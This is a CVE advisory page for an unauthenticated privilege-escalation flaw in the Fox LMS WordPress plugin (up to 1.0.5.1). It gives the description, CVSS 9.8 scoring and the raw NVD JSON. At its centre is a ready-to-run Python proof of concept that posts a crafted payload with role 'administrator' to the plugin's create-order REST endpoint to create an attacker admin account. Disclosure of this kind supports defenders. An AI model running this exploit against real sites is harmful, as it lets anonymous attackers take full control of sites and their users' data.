Security Vulnerability Report
中文
CVE-2025-14156 CVSS 9.8 CRITICAL

CVE-2025-14156

Published: 2025-12-15 15:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Fox LMS – WordPress LMS Plugin plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.5.1. This is due to the plugin not properly validating the 'role' parameter when creating new users via the `/fox-lms/v1/payments/create-order` REST API endpoint. This makes it possible for unauthenticated attackers to create new user accounts with arbitrary roles, including administrator, leading to complete site compromise.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Fox LMS WordPress LMS Plugin <= 1.0.5.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-14156 PoC - Fox LMS Privilege Escalation # Target: WordPress site with Fox LMS plugin <= 1.0.5.1 target_url = "http://target-wordpress-site.com" api_endpoint = "/wp-json/fox-lms/v1/payments/create-order" # Create malicious request to create admin user payload = { "email": "[email protected]", "username": "attacker_admin", "first_name": "Attacker", "last_name": "User", "role": "administrator", # Privilege escalation - arbitrary role assignment "course_id": 1, "payment_method": "free" } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } try: response = requests.post( f"{target_url}{api_endpoint}", json=payload, headers=headers, timeout=10 ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") if response.status_code == 200: print("\n[!] Exploitation successful - Admin account created!") print(f"[*] Username: attacker_admin") print(f"[*] Email: [email protected]") print(f"[*] Role: administrator") except requests.exceptions.RequestException as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14156", "sourceIdentifier": "[email protected]", "published": "2025-12-15T15:15:49.173", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Fox LMS – WordPress LMS Plugin plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.5.1. This is due to the plugin not properly validating the 'role' parameter when creating new users via the `/fox-lms/v1/payments/create-order` REST API endpoint. This makes it possible for unauthenticated attackers to create new user accounts with arbitrary roles, including administrator, leading to complete site compromise."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Ffox-lms%2Ftags%2F1.0.5.0%2Fincludes%2Frest%2FPayments.php&new_path=%2Ffox-lms%2Ftags%2F1.0.5.2%2Fincludes%2Frest%2FPayments.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/de4f8d45-9522-4a32-bc98-be8dbf3a5cf1?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.